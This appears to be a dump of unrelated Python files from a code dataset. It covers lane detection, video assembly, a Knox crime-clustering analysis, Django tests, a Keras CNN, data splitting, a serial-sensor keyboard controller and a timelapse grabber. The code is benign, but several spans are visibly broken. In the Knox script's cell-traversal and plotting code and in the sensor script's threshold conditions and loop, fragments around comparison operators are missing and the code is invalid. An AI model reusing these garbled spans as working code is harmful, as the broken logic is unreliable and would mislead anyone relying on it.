cam_calib.dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', cam_calib.nx, cam_calib.ny, cam_calib.pickle_file_name, True)\n #testUndistor('camera_cal/calibration5.jpg', cam_calib.mtx, cam_calib.dist)\n \n params = Parameters()\n params.camera_calibration = cam_calib\n #params.printValues()\n# left_line = Line()\n# right_line = Line()\n# cnt_h = 0\n# cnt_nh = 0\n\n input_folder = 'test_images'\n output_folder = 'output_images'\n file_pattern = '*.jpg'\n fnames = os.path.join(input_folder, file_pattern)\n print('fnames', fnames)\n #fnames = 'camera_cal/calibration5.jpg'\n \n images = glob.glob(fnames)\n for idx, fname in enumerate(images):\n print(idx, fname)\n image = mpimg.imread(fname)\n result = pipeline(image, mtx, dist, sobel_kernel=ksize, s_thresh=(170, 255), sx_thresh=(20, 100))\n out_file = os.path.join(output_folder, os.path.split(fname)[1])\n #mpimg.imsave(out_file, result)\n plt.figure(figsize=(16,12))\n plt.imshow(result)\n plt.show()\n print()\n return True\n\n#-----------------------------------------------------------------------#\n# A convenience method to process video frame\n#-----------------------------------------------------------------------#\ndef processVideoFrame(image):\n result = pipeline(image, cam_calib.mtx, cam_calib.dist, sobel_kernel=params.sobel_kernel, s_thresh=params.s_thresh, sx_thresh=params.sx_thresh)\n return result\n\n#-----------------------------------------------------------------------#\n# A convenience method to process video file\n#-----------------------------------------------------------------------#\ndef processVideo():\n # Main Function\n print('\\n***** Starting Main Function *****')\n# cam_calib = CameraCalibration()\n# cam_calib.mtx, cam_calib.dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', cam_calib.nx, cam_calib.ny, cam_calib.pickle_file_name, True)\n# #testUndistor('camera_cal/calibration5.jpg', cam_calib.mtx, cam_calib.dist)\n# \n# params = Parameters()\n# params.camera_calibration = cam_calib\n# params.printValues()\n# left_line = Line()\n# right_line = Line()\n# cnt_h = 0\n# cnt_nh = 0\n \n #vc_in_fn = 'NH_45_NearChennai.mp4'\n #vc_in_fn = 'harder_challenge_video.mp4'\n #vc_in_fn = 'challenge_video.mp4'\n vc_in_fn = 'project_video.mp4'\n vc_out_fn = 'out_' + vc_in_fn\n vclip = VideoFileClip(vc_in_fn)\n #vclip = vclip.subclip(0, 30)\n processed_vclip = vclip.fl_image(processVideoFrame)\n processed_vclip.write_videofile(vc_out_fn, audio=False)\n \n print('***** Program Execution Completed *****\\n')\n return True\n\ncam_calib = CameraCalibration()\ncam_calib.mtx, cam_calib.dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', cam_calib.nx, cam_calib.ny, cam_calib.pickle_file_name, True)\n#testUndistor('camera_cal/calibration5.jpg', cam_calib.mtx, cam_calib.dist)\n\nparams = Parameters()\nparams.camera_calibration = cam_calib\n#params.printValues()\ncnt_h = 0\ncnt_nh = 0\nleft_line = Line()\nright_line = Line()\n\n#processImages()\nprocessVideo()\n\n#mtx, dist = calibrateCameraBySamples('camera_cal', 'calibration*.jpg', 9, 6, pickle_file_name='cam_calib_mtx_dist.p')\n#testUndistor('camera_cal/calibration5.jpg', mtx, dist)\n#testUndistor('test_images/test2.jpg', mtx, dist)","sub_path":"CarND-Advanced-Lane-Lines-P4/p4.py","file_name":"p4.py","file_ext":"py","file_size_in_byte":36659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"3803451","text":"\nfrom os import listdir\nfrom os.path import join, sep\nimport sys\nfrom utils import (check_if_path, remove_empty_folders)\n\n\n# import the function that reads frames and converts them to videos\n#sys.path.append('/vol/atlas/homes/grigoris/gits/pyutils/')\n#import frames2videos as fr2vid\n#import resize_image as rim\n# requires the package from https://github.com/grigorisg9gr/pyutils\nfrom research_pyutils.frames2videos import main as fr2vid_main\nfrom research_pyutils.resize_image import bulkResize\n\n\ndef main_call_visualisation_to_videos(path_0, overwrite):\n path_clips = join(path_0, 'visualisations', '')\n\n if not check_if_path(path_clips, ''):\n raise ValueError('The visualisation path {} does not seem to exist'.format(path_clips))\n\n # call from parent folder of visualisations, it will make videos for all different steps of the algorithm\n vid_fold = '1_videos'\n call_video_maker(path_clips, vid_fold, overwrite)\n p_cmp = join(path_clips, 'compare', '')\n if check_if_path(p_cmp, ''): # call for comparisons as well\n call_video_maker(p_cmp, vid_fold, overwrite)\n\n\ndef call_video_maker(path_clips, vid_fold, overwrite=False):\n list_paths = sorted(listdir(path_clips))\n for i in list_paths:\n if i == 'compare':\n continue\n p1 = path_clips + i + sep\n if not check_if_path(p1, ''): # if the folder does not exist, continue.\n continue\n # if: a) it has sufficient files, b) overwrite == False, then continue.\n if (not overwrite) and check_if_path(p1 + vid_fold, ''):\n len_clips = len(listdir(p1))\n print(i, ' ', len_clips, ' ', len(listdir(p1 + vid_fold)))\n if len(listdir(p1 + vid_fold)) > len_clips-3:\n continue\n\n remove_empty_folders(p1)\n print(i, ' ', len(listdir(p1)))\n if len(listdir(p1)) == 0:\n continue\n try:\n bulkResize(p1)\n except TypeError as e:\n print('Probably there is a folder with no images {}, skipping it.'.format(p1))\n print(e)\n continue\n except IOError as e:\n print('Probably image not found, skipping this video.')\n print(e)\n continue\n fr2vid_main(p1, vid_fold=vid_fold)\n remove_empty_folders(path_clips)\n\n\nif __name__ == '__main__':\n overwrite_m = False # Overwrite old written videos\n args = len(sys.argv)\n if args > 1:\n path_0_m = str(sys.argv[1])\n else:\n raise RuntimeError('File not called with initial path.')\n if args > 2:\n overwrite_m = True\n main_call_visualisation_to_videos(path_0_m, overwrite_m)\n","sub_path":"visualisations_to_videos.py","file_name":"visualisations_to_videos.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"193623421","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 2 13:35:29 2019\n\n@author: lawdfo\n\"\"\"\n\n\n\n# Some fairly standard modules\nimport os, csv, lzma\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport descartes\nfrom itertools import product\nfrom collections import Counter, defaultdict\nimport random\nimport statistics\n\n# The geopandas module does not come standard with anaconda,\n# so you'll need to run the anaconda prompt as an administrator\n# and install it via \"conda install -c conda-forge geopandas\".\n# That installation will include pyproj and shapely automatically.\n# These are useful modules for plotting geospatial data.\nimport geopandas as gpd\nimport pyproj\nimport shapely.geometry\n\n# These modules are useful for tracking where modules are\n# imported from, e.g., to check we're using our local edited\n# versions of open_cp scripts.\nimport sys\nimport inspect\nimport importlib\n\n# In order to use our local edited versions of open_cp\n# scripts, we insert the parent directory of the current\n# file (\"..\") at the start of our sys.path here.\nsys.path.insert(0, os.path.abspath(\"..\"))\n\n# Elements from PredictCode's custom \"open_cp\" package\nimport open_cp\nimport open_cp.geometry\nimport open_cp.plot\nimport open_cp.sources.chicago as chicago\nimport open_cp.retrohotspot as retro\nimport open_cp.prohotspot as phs\nimport open_cp.knox\n\n\n\n\n\n_cdict = {'red': [(0.0, 1.0, 1.0),\n (1.0, 1.0, 1.0)],\n 'green': [(0.0, 1.0, 1.0),\n (1.0, 0.0, 0.0)],\n 'blue': [(0.0, 0.2, 0.2),\n (1.0, 0.2, 0.2)]}\n\nyellow_to_red = matplotlib.colors.LinearSegmentedColormap(\"yellow_to_red\", _cdict)\n\n\n\n\n\nclass KnoxEntry:\n \n def __init__(self, start_date = None, end_date = None, num_events = -1):\n self.start_date = start_date\n self.end_date = end_date\n self.num_events = num_events\n self.pvals = []\n self.stats = []\n self.dists = []\n self.medians = []\n self.ratios = []\n \n\n\n\n\n\ndef knox_ratio(knox_statistic, distribution):\n \"\"\"As in the paper, compute the ratio of the statistic to the median\n of the values in the distribution\"\"\"\n #d = np.array(distribution)\n #d.sort()\n #return statistic / d[len(d)//2]\n return knox_statistic / statistics.median(distribution)\n\n\n\n\ndef significant_cells(pvalue_array, sig_thresh=0.05):\n return pvalue_array < sig_thresh\n\ndef contiguous_cells(data_array, origin=(0,0)):\n array_dims = np.shape(data_array)\n need_to_visit_stack = [origin]\n visited_array = np.zeros_like(data_array, dtype=bool)\n contig_array = np.zeros_like(data_array, dtype=bool)\n \n val = data_array[origin]\n \n tempctr = 0\n while len(need_to_visit_stack)>0:\n curr_cell = need_to_visit_stack.pop(0)\n tempctr += 1\n if visited_array[curr_cell]:\n continue\n visited_array[curr_cell] = True\n if data_array[curr_cell] != val:\n continue\n contig_array[curr_cell] = True\n for dim_index, dim_size in enumerate(array_dims):\n cc_index_val = curr_cell[dim_index]\n if cc_index_val>0:\n need_to_visit_stack.append(curr_cell[:dim_index] + (cc_index_val-1,) + curr_cell[dim_index+1:])\n if cc_index_val= p_thresh:\n continue\n p = matplotlib.patches.Rectangle((sbin_index*sbin_size, tbin_index*tbin_size), sbin_size, tbin_size, fc=mappable.to_rgba(knox_entry.ratios[sbin_index,tbin_index]))\n ax.add_patch(p)\n \n cbar = fig.colorbar(mappable, orientation=\"vertical\")\n cbar.set_label(\"Knox ratio\")\n \n \n\n\n\n\ndatadir = os.path.join(\"..\", \"..\", \"Data\")\nchicago_file_name = \"chicago_all_old.csv\"\nchicago_side = \"South\"\n#crime_type_set = {\"THEFT\"}\ncrime_type_set = {\"BURGLARY\"}\nchicago_file_path = os.path.join(datadir, chicago_file_name)\nchicago.set_data_directory(datadir)\n\n\n\n\nexp_limit = 100\nnum_time_bins = 10\nnum_dist_bins = 20\nnum_knox_iters = 100\nsbin_size = 100\ntbin_size = 7\n\nknox_file_path = os.path.join(datadir, \n \"knox_190330_sschi_burg_cell250_sbin100_tbin7_iter100.txt\")\nwith open(knox_file_path) as kf:\n exp_num = -1\n stype = \"lastline\"\n sctr = 0\n sdata = []\n knox_data = []\n for lnum, kline in enumerate(kf):\n kline = kline.strip()\n \n #if stype != \"distribution\":\n # print(\"{}:{}:{}\".format(exp_num, lnum, kline))\n #if lnum >50:\n # break\n \n \n if len(kline)==0:\n if stype == \"distribution\":\n knox_data[-1].dists = np.asarray(sdata).reshape(num_dist_bins, num_time_bins, num_knox_iters)\n knox_data[-1].medians = np.zeros((num_dist_bins, num_time_bins))\n knox_data[-1].ratios = np.zeros((num_dist_bins, num_time_bins))\n for i in range(num_dist_bins):\n for j in range(num_time_bins):\n knox_data[-1].medians[i][j] = statistics.median(knox_data[-1].dists[i][j])\n knox_data[-1].ratios = knox_data[-1].stats/knox_data[-1].medians\n \n stype = \"lastline\"\n continue\n elif stype != \"lastline\":\n print(\"Error, unexpected empty line at {}:{}\".format(exp_num, lnum))\n sys.exit(1)\n exp_num += 1\n stype = \"info\"\n sctr = 0\n sdata = []\n if exp_num >= exp_limit:\n break\n continue\n \n if stype == \"info\":\n if kline == \"p values\":\n knox_data.append(KnoxEntry(*sdata))\n sdata = []\n sctr = 0\n stype = \"p values\"\n continue\n if sctr in [0,1]:\n sdata.append(np.datetime64(kline))\n elif sctr == 2:\n sdata.append(int(kline))\n else:\n print(\"Error, info section incorrect in part {}?\".format(exp_num))\n sys.exit(1)\n sctr += 1\n continue\n elif stype == \"p values\":\n if kline == \"statistics\":\n knox_data[-1].pvals = sdata\n sdata = []\n sctr = 0\n stype = \"statistics\"\n continue\n next_row = np.array([float(x) for x in kline.split()])\n if sctr == 0:\n sdata = next_row\n else:\n sdata = np.vstack([sdata, next_row])\n sctr += 1\n elif stype == \"statistics\":\n if kline == \"distribution\":\n knox_data[-1].stats = sdata\n sdata = []\n sctr = 0\n stype = \"distribution\"\n continue\n next_row = np.array([int(float(x)) for x in kline.split()])\n if sctr == 0:\n sdata = next_row\n else:\n sdata = np.vstack([sdata, next_row])\n sctr += 1\n elif stype == \"distribution\":\n sctr += 1\n \n # [...\n # start of dist for 1st cell in row\n if kline[0]==\"[\":\n kline = kline[1:]\n \n # ...] [...\n # end of one dist, start of another, in row\n elif \"] [\" in kline:\n kline = \" \".join(kline.split(\"] [\"))\n \n # ...]\n # end of dist for last cell in row\n elif kline[-1] == \"]\":\n kline = kline[:-1]\n \n # ...\n # typical line of numbers in middle of a dist\n else:\n pass\n \n sdata += [int(float(x)) for x in kline.split()]\n \n\nprint(\"\\# events per experiment\")\nfor exp in knox_data:\n print(\"{}:{}\".format(exp.start_date,exp.num_events))\n\nbandwidth_selections = [\"along_axis\", \"contig_to_axis\",\"contig_anywhere\"]\nbandwidth_pairs_dict = defaultdict(list)\nfor exp_num, exp in enumerate(knox_data):\n #print(\"Exp num {}\".format(exp_num))\n #print(exp.ratios)\n \n if exp_num<15:\n plot_signif_knox_ratios(exp, sbin_size, tbin_size, 0.05)\n \n \n for band_sel in bandwidth_selections:\n bandwidth_pairs_dict[band_sel].append(get_bandwidths_from_knox(exp.pvals, selection=band_sel))\n\n\n\n\nfig, ax = plt.subplots(figsize=(12,4))\nfor i, band_sel in enumerate(bandwidth_selections):\n ax.plot(np.linspace(2001, 2017.5, 34), [(x[0]+1+(.1*i))*sbin_size for x in bandwidth_pairs_dict[band_sel]])\nax.legend(bandwidth_selections)\nax.set_title(\"Spatial bandwidths determined by Knox, in meters\")\n\n\nfig, ax = plt.subplots(figsize=(12,4))\nfor i, band_sel in enumerate(bandwidth_selections):\n ax.plot(np.linspace(2001, 2017.5, 34), [(x[1]+1+(.1*i))*tbin_size/7 for x in bandwidth_pairs_dict[band_sel]])\nax.legend(bandwidth_selections)\nax.set_title(\"Temporal bandwidths determined by Knox, in weeks\")\n\n\n","sub_path":"sandbox/knoxAnalysisOrig.py","file_name":"knoxAnalysisOrig.py","file_ext":"py","file_size_in_byte":11483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"288148883","text":"import plotly.express as px\nfrom myproject import db\nfrom myproject.models import Animal\n\n\n\n\nanimals = Animal.query.all()\n\nfe =animals[0].feedEfficiency\nmp = animals[0].ch4_daily_mean\nwe = animals[0].waterEfficieny\n\nfig = px.bar(x=[\"Feed Efficieny\",\"Water Efficiency\", \"Methane Production\"], y =[fe, we,mp ])\nfig.update_layout(xaxis_type='category',\n title_text='Bar chart with categorical axes')\nfig.show()","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"603834917","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"smartlogger\",\n version=\"0.0.1\",\n author=\"Blue Walkers Team\",\n author_email=\"bluewlkrs@gmail.com\",\n description=\"Easy smart logging for you python project\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/blue-walkers/smartlogger\",\n packages=setuptools.find_packages(),\n classifiers=(\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Development Status :: 1 - Planning\",\n \"Topic :: Scientific/Engineering :: Information Analysis\",\n \"Topic :: Software Development :: Build Tools\"\n ),\n install_requires=[\n \"certifi==2019.3.9\",\n \"chardet==3.0.4\",\n \"discord-webhook==0.4.1\",\n \"idna==2.8\",\n \"peewee==3.9.5\",\n \"requests==2.22.0\",\n \"urllib3==1.25.2\"\n ],\n zip_safe=False\n)\n","sub_path":"pypi_install_script/smartlogger-0.0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"222295252","text":"from django.test import TestCase, override_settings\n\nfrom ..models import PillowCheckpointSeqStore\nfrom ..utils import pillow_seq_store, EPSILON\n\n\ndef _get_dummy_pillow():\n from pillowtop.tests.utils import make_fake_constructed_pillow\n return make_fake_constructed_pillow('dummy pillow', 'test_checkpoint_seq_store')\n\nDummyPillow = _get_dummy_pillow\n\n\n@override_settings(PILLOWTOPS={'test': ['corehq.apps.hqadmin.tests.test_utils.DummyPillow']})\nclass TestPillowCheckpointSeqStore(TestCase):\n dependent_apps = ['pillowtop']\n\n def setUp(self):\n self.pillow = DummyPillow()\n\n def test_basic_cloudant_seq(self):\n seq = '1-blahblah'\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, seq)\n\n def test_basic_couchdb_seq(self):\n seq = 100\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, str(seq))\n\n def test_small_rewind(self):\n \"\"\"\n We should not notify if the seq is not significantly less than the previous\n \"\"\"\n seq = '10-blahblah'\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n\n seq_rewind = '9-blahblah'\n self.pillow.set_checkpoint({'seq': seq_rewind})\n pillow_seq_store()\n\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, seq_rewind)\n\n def test_large_rewind(self):\n \"\"\"\n We should notify if the seq is significantly less than the previous and not update the seq\n \"\"\"\n seq = '{}-blahblah'.format(EPSILON + 10)\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n\n seq_rewind = '9-blahblah'\n self.pillow.set_checkpoint({'seq': seq_rewind})\n pillow_seq_store()\n\n store = PillowCheckpointSeqStore.objects.get(checkpoint_id=self.pillow.checkpoint.checkpoint_id)\n self.assertEquals(store.seq, seq)\n\n def test_get_by_pillow_name(self):\n seq = '10-blahblah'\n self.pillow.set_checkpoint({'seq': seq})\n pillow_seq_store()\n\n store = PillowCheckpointSeqStore.get_by_pillow_name('DummyPillow')\n self.assertIsNotNone(store)\n\n store = PillowCheckpointSeqStore.get_by_pillow_name('DummyPillowThatDoesNotExist')\n self.assertIsNone(store)\n","sub_path":"corehq/apps/hqadmin/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"72910245","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\n\n\nfrom keras.preprocessing.sequence import TimeseriesGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv1D, GlobalAveragePooling1D,MaxPooling1D,Dropout\nimport keras\nfrom keras.utils import to_categorical\n\nfrom commons.path_ import listdir, get_dir_file, readCSV, abspath, readDF, saveDF, join, split_dir, readXLS\nfrom wangzifei.settings import origina_data_dir, tmp_data_dir, COM_LIST\nfrom wangzifei.load_data import load_day_info, load_min_info\nfrom wangzifei.make_data import make_dataSet\n\n\nfeature_col = [ 'open', 'high', 'low', 'close', 'volume', 'hold', 'strike']\nfeature_length = len(feature_col)\nlabel_col = 'label'\nhistory_length= 5\nbatch_size=100\n\n\ndef prepareCNN(df, history_length=history_length, batch_size=batch_size):\n\tdf[label_col] = df[label_col].astype(int)\n\t#要求输入的数据是3D张量,即(samples, time_steps, features)\n\tdf = df[df[label_col] != 0]\n\tdata = df[feature_col].values\n\ttargets = df[label_col].values\n\ttargets = to_categorical(targets)\n\tts_gen = TimeseriesGenerator(data, targets,\n\t length=history_length, \n\t batch_size=batch_size)\n\n\treturn ts_gen\n\n\ndef buildCNN(batch_size=batch_size, history_length=history_length,feature_length = feature_length):\n\tmodel_m = Sequential()\n\tnum_classes = 2\n\tmodel_m.add(Conv1D(filters = 100, kernel_size = 2, activation='relu', input_shape=(history_length, feature_length)))\n\tmodel_m.add(Conv1D(filters = 100, kernel_size = 2, activation='relu'))\n\t# model_m.add(MaxPooling1D(feature_length))\n\t# model_m.add(Conv1D(100, 2, activation='relu'))\n\t# model_m.add(Conv1D(100, 2, activation='relu'))\n\tmodel_m.add(GlobalAveragePooling1D())\n\tmodel_m.add(Dropout(0.5))\n\tmodel_m.add(Dense(2, activation='softmax'))\n\n\tprint(model_m.summary())\n\treturn model_m\n\ndef compileCNN(model_m, gen=None,x_train=None, y_train=None, epochs=30, batch_size=batch_size):\n\tcallbacks_list = [\n\t keras.callbacks.ModelCheckpoint(\n\t filepath='best_model.{epoch:02d}-{acc:.2f}.h5',\n\t monitor='acc',\n\t save_best_only=True),\n\t keras.callbacks.EarlyStopping(monitor='acc', patience=1)\n\t]\n\n\tmodel_m.compile(loss='categorical_crossentropy',\n\t optimizer='adam', metrics=['accuracy'])\n\tif gen is not None:\n\t\thistory = model_m.fit_generator(generator=gen, epochs=epochs, verbose=2)\n\telse:\n\t\thistory = model_m.fit(x_train,\n y_train,\n batch_size=batch_size,\n epochs=epochs)\n\treturn history\n\n\ndef evaluate_result(model_m, x, y):\n\t# Print confusion matrix for training data\n\n\ty_pred_train = model_m.predict(x)\n\t# Take the class with the highest probability from the train predictions\n\tmax_y_pred_train = np.argmax(y_pred_train, axis=1)\n\tprint(classification_report(y, max_y_pred_train))\n\tplt = show_confusion_matrix(y, max_y_pred_train)\n\treturn plt\n\n\ndef plot_learning_curves(history):\n\tplt.figure(figsize=(6, 4))\n\tplt.plot(history.history['acc'], 'r', label='Accuracy of training data')\n\t# plt.plot(history.history['val_acc'], 'b', label='Accuracy of validation data')\n\tplt.plot(history.history['loss'], 'r--', label='Loss of training data')\n\t# plt.plot(history.history['val_loss'], 'b--', label='Loss of validation data')\n\tplt.title('Model Accuracy and Loss')\n\tplt.ylabel('Accuracy and Loss')\n\tplt.xlabel('Training Epoch')\n\tplt.ylim(0)\n\tplt.legend()\n\treturn plt\n\n\ndef show_confusion_matrix(y_true, y_pred, LABELS=None):\n matrix = metrics.confusion_matrix(y_true, y_pred)\n plt.figure(figsize=(6, 4))\n sns.heatmap(matrix,\n cmap='coolwarm',\n linecolor='white',\n linewidths=1,\n # xticklabels=LABELS,\n # yticklabels=LABELS,\n annot=True,\n fmt='d')\n plt.title('Confusion Matrix')\n plt.ylabel('True Label')\n plt.xlabel('Predicted Label')\n return plt\n\n\nif __name__ == \"__main__\":\n\tdf = make_dataSet()\n\t# history_length= 5\n\tN_samples, _ = df.shape\n\ttrain_df = df.iloc[:int(N_samples *0.8), :].copy()\n\ttest_df = df.iloc[int(N_samples * 0.8):,: ].copy()\n\n\ttrain_gen = prepareCNN(train_df, batch_size=1)\n\n\tX = []\n\tY = []\n\tfor i, X_Y_pair in enumerate(train_gen):\n\t\tx, y = X_Y_pair\n\t\tX.append(X_Y_pair[0])\n\t\tY.append(X_Y_pair[1])\n\n\tmodel_m = buildCNN(history_length=history_length, feature_length = feature_length)\n\t# history = compileCNN(model_m, x_train=X, y_train=Y)\n\thistory = compileCNN(model_m, gen=train_gen)\n\n\tplt = plot_learning_curves(history)\n\tprint(\"evaluate train result \")\n\tevaluate_result(model_m, X, Y)\n\n\n\ttest_gen = prepareCNN(test_df, batch_size=1)\n\n\tX = []\n\tY = []\n\tfor i, X_Y_pair in enumerate(test_gen):\n\t\tx, y = X_Y_pair\n\t\tX.append(X_Y_pair[0])\n\t\tY.append(X_Y_pair[1])\n\tprint(\"evaluate test result \")\n\tevaluate_result(model_m, X, Y)\n\tpass\n\n","sub_path":"wangzifei/run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":5012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"336851833","text":"##############################################################################\n# Claudia Schulz\n# November 2017\n#\n# take 30,000 tokens of each dataset and split this into 21,000 train and 9,000 dev (70%,30%)\n# take the rest of the dataset for test\n# and create pickled files for each dataset with different word embeddings\n##############################################################################\n\nimport os\nimport random\nimport logging\nfrom util.preprocessing import perpareDataset\n\n##############################################################################\ndef createSplits(dataFolder, resultFolder):\n with open(resultFolder + \"/train.txt\", 'w') as train,\\\n open(resultFolder + \"/dev.txt\", 'w') as dev,\\\n open(resultFolder + \"/test.txt\", 'w') as test:\n # create list of all available datapoints (annotated files)\n dataList = []\n for data in os.listdir(dataFolder):\n dataList.extend([data])\n #print(dataList)\n # shuffle the datapoints\n random.shuffle(dataList)\n dataPointCounter = 0\n\n # write (at least) 21000 tokens as training set\n tokenCounterTrain = 0\n while tokenCounterTrain <= 21000:\n dataPoint = dataList[dataPointCounter]\n with open(dataFolder + \"/\" + dataPoint, 'r') as text:\n for line in text:\n train.write(line)\n tokenCounterTrain +=1\n train.write(\"\\n\")\n dataPointCounter +=1\n\n dataFilesForTraining = dataPointCounter + 1\n print(\"Train set of \" + resultFolder + \" has size (no of tokens): \" + str(tokenCounterTrain) + \"\\n\")\n print(\"This used \" + str(dataFilesForTraining) + \" data files out of \" + str(len(dataList)) + \"\\n\")\n\n\n # write (at least) 9000 tokens as dev set\n tokenCounterDev = 0\n while tokenCounterDev <= 9000:\n dataPoint = dataList[dataPointCounter]\n with open(dataFolder + \"/\" + dataPoint, 'r') as text:\n for line in text:\n dev.write(line)\n tokenCounterDev +=1\n dev.write(\"\\n\")\n dataPointCounter +=1\n\n dataFilesForDev = dataPointCounter + 1 - dataFilesForTraining\n print(\"Dev set of \" + resultFolder + \" has size (no of tokens): \" + str(tokenCounterDev) + \"\\n\")\n print(\"This used \" + str(dataFilesForDev) + \" data files out of \" + str(len(dataList)) + \"\\n\")\n\n # write the rest as test set\n tokenCounterTest = 0\n while dataPointCounter < len(dataList):\n dataPoint = dataList[dataPointCounter]\n with open(dataFolder + \"/\" + dataPoint, 'r') as text:\n for line in text:\n test.write(line)\n tokenCounterTest +=1\n test.write(\"\\n\")\n dataPointCounter +=1\n\n dataFilesForTesting = dataPointCounter + 1 - dataFilesForTraining - dataFilesForDev\n print(\"Test set of \" + resultFolder + \" has size (no of tokens): \" + str(tokenCounterTest) + \"\\n\")\n print(\"This used \" + str(dataFilesForTesting) + \" data files out of \" + str(len(dataList)) + \"\\n\")\n\n print(\"In total, \" + str(dataPointCounter) + \" data files out of \"+ str(len(dataList)) + \" were used\")\n return\n\n\n##############################################################################\ndef pickleData(embeddingsPath, datasetName, dataColumns):\n datasetFiles = [(datasetName, dataColumns), ]\n pickleFile = perpareDataset(embeddingsPath, datasetFiles)\n\n\n\n##############################################################################\n##############################################################################\n\nabspath = os.path.abspath(__file__)\ndname = os.path.dirname(abspath)\nos.chdir(dname)\n\n# :: Logging level ::\nloggingLevel = logging.INFO\nlogger = logging.getLogger()\nlogger.setLevel(loggingLevel)\n\n#ch = logging.StreamHandler(sys.stdout)\nch = logging.FileHandler('singleArgExperimentsSmallData.log')\nch.setLevel(loggingLevel)\nformatter = logging.Formatter('%(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n# USER ACTION NEEDED\n# put BIO-labelled corpora here (in subfolders)\ndataPath = dname + \"/corpora\"\n\n# output path for train, dev, test splits (subfolders will be created for each corpus)\nresultPath = dname + \"/data_singleTask\"\n\n# USER ACTION NEEDED\n# put embeddings here (GloVe and [Komninos & Mandhar 2016])\nembeddingsPath = dname + \"/embeddings\"\n\n\nfor dataName in os.listdir(dataPath):\n dataFolder = dataPath + \"/\" + dataName\n print(dataName)\n if os.path.isdir(dataFolder):\n resultFolder = resultPath + \"/\" + dataName\n if not os.path.exists(resultFolder):\n os.makedirs(resultFolder, 0o777)\n createSplits(dataFolder, resultFolder)\n for embeddingsName in os.listdir(embeddingsPath):\n if embeddingsName == \"glove.txt\" or embeddingsName == \"wiki_extvec\":\n embeddingsFull = embeddingsPath + \"/\" + embeddingsName\n if os.path.isfile(embeddingsFull):\n print(embeddingsName)\n pickleData(embeddingsFull, dataName, {0:'tokens', 1:'arg_BIO'})\n\n","sub_path":"splitsAndPickle_singleTask.py","file_name":"splitsAndPickle_singleTask.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"165518539","text":"from pynput.keyboard import Key, Controller\nimport serial\nimport time\n\nserialPort = serial.Serial(port = \"COM9\", baudrate=9600)\nkeyboard = Controller()\n\nprint(\"Keep still!\")\ntime.sleep(2)\nline = serialPort.readline()\nbaseline = line.decode()\nbaseline = float(baseline)\n#thresholdUp = 20\n#threshold = 15\nprint(\"Done\")\nprint(baseline)\nflagDown = 0\nflagUp = 0\n\ndef getThreshold( serialPort, deltaTime, effortRatio=0.8):\n starTime = time.time()\n maxUp = -1\n maxDown = 1\n\n while time.time()-starTime maxUp:\n maxUp = XAngle\n thresholdUp = maxUp * effortRatio\n thresholdDown = maxDown * effortRatio\n return thresholdUp, thresholdDown\n\nthresholdUp, threshold = getThreshold(serialPort,5)\nthreshold = abs(threshold)\nprint(thresholdUp, \" \", threshold)\nwhile True:\n line = serialPort.readline()\n decodedLine = line.decode()\n angle = float(decodedLine)\n if anglebaseline-threshold*0.1 and anglebaseline+threshold and flagDown ==0:\n print(\"down\")\n keyboard.press(Key.down)\n keyboard.release(Key.down)\n\n flagDown = 1\n","sub_path":"organised code/PythonScripts/readSerial.py","file_name":"readSerial.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"647496991","text":"\"\"\"\r\n Quick and dirty way to grab images from ip cameras to make a time lapes video\r\n I wrote this to use with IP Webcam for Android , but it should work with any\r\n cameras that have a single frame output.\r\n\r\n\r\n ### Usage : Just run tldownload.py , then it will ask you for url and settings\r\n\r\n IP Webcam for android has these urls :\r\n\r\n - http://:8080/photo.jpg Takes a regular photo with the camera\r\n - http://:8080/photoaf.jpg This one focuses first, then takes the photo (slower)\r\n - http://:8080/shot.jpg Grabs latest frame from video feed, with overlays etc\r\n\r\n - Download IP Webcam for android : 